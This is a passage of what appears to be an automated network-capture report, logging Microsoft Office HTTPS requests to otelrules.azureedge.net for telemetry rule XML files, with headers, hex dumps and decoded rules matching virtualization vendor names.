                                                                                                                                                                        Data Ascii: d0MX2B4MQVSQTzLIpaX2l9MMAiRdrZc3MCbvPLPqKdt+ZqBqOV5i9rbIdY+mADRiEf8Rpw9OtCRixfwvgQk6vryV4b57zrcSxi3UnyP31FX1a0AH/q9VEWIFTCthLZv8LEC1/plLBlc1jccKVrZ1xTAvEXa+voQF0zWK/kTdb41ottUvOBqnEmad1J8j99RV9WtAB/6vVRFiBUwrZj
                                                                                                                                                                        2024-11-21 09:37:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        69192.168.2.64978013.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:42 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:42 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:42 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                        x-ms-request-id: be70f01e-301e-000c-538c-3a323f000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093742Z-1777c6cb754dqb2khC1TEBmk1s0000000axg000000005kwt
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:42 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        70192.168.2.64978213.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:43 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:43 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:43 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                        x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093743Z-178bfbc474bmqmgjhC1NYCy16c00000001b0000000007a8k
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:43 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        71192.168.2.64978313.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:44 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:44 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:44 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                        x-ms-request-id: c2563176-701e-001e-70d5-3bf5e6000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093744Z-178bfbc474bw8bwphC1NYC38b4000000012000000000az5r
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:44 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        72192.168.2.64978413.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:44 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:44 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:44 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 485
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                        ETag: "0x8DC582BB9769355"
                                                                                                                                                                        x-ms-request-id: cf2b2526-c01e-0082-5660-3baf72000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093744Z-178bfbc474bp8mkvhC1NYCzqnn000000010000000000fkh3
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:44 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        73192.168.2.64978513.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:44 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:44 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:44 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 411
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                        ETag: "0x8DC582B989AF051"
                                                                                                                                                                        x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093744Z-1777c6cb7544nvmshC1TEBf7qc0000000as00000000062fx
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:44 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        74192.168.2.64978613.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:44 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:45 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 470
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                        ETag: "0x8DC582BBB181F65"
                                                                                                                                                                        x-ms-request-id: 137cb315-101e-0017-3264-3b47c7000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093745Z-178bfbc474bnwsh4hC1NYC2ubs00000001e0000000002pgg
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:45 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        75192.168.2.64978813.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:45 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:45 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:45 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                        ETag: "0x8DC582BB556A907"
                                                                                                                                                                        x-ms-request-id: 2deeee2f-b01e-001e-4967-3b0214000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093745Z-178bfbc474bnwsh4hC1NYC2ubs00000001c00000000066hx
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:45 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        76192.168.2.64978913.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:46 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:46 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 502
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                        ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                        x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093746Z-178bfbc474bpnd5vhC1NYC4vr4000000018g000000008w5m
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:47 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        77192.168.2.64979013.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:46 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:47 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 407
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                        ETag: "0x8DC582B9D30478D"
                                                                                                                                                                        x-ms-request-id: 04c68412-701e-000d-5268-3b6de3000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093747Z-178bfbc474bbcwv4hC1NYCypys000000015g000000004y0g
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-21 09:37:47 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        78192.168.2.64979113.107.246.60443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-21 09:37:46 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-21 09:37:47 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Thu, 21 Nov 2024 09:37:47 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 474
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                        ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                        x-ms-request-id: 957844e9-801e-008c-4868-3b7130000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241121T093747Z-178bfbc474btrnf9hC1NYCb80g00000001f000000000544u
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
